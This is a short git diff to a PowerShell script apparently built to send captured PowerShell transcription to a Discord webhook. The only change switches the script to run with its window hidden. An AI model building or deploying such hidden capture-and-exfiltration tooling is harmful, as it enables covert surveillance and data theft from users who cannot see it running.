diff --git a/Global-PS-Trascription-to-Discord/main.ps1 b/Global-PS-Trascription-to-Discord/main.ps1 index 8998a26..a93a9ee 100644 --- a/Global-PS-Trascription-to-Discord/main.ps1 +++ b/Global-PS-Trascription-to-Discord/main.ps1 @@ -1,6 +1,6 @@ $webhookUrl = "$dc" -$hideWindow = 0 # 1 = Hidden +$hideWindow = 1 # 1 = Hidden [Console]::BackgroundColor = "Black" [Console]::SetWindowSize(60, 20)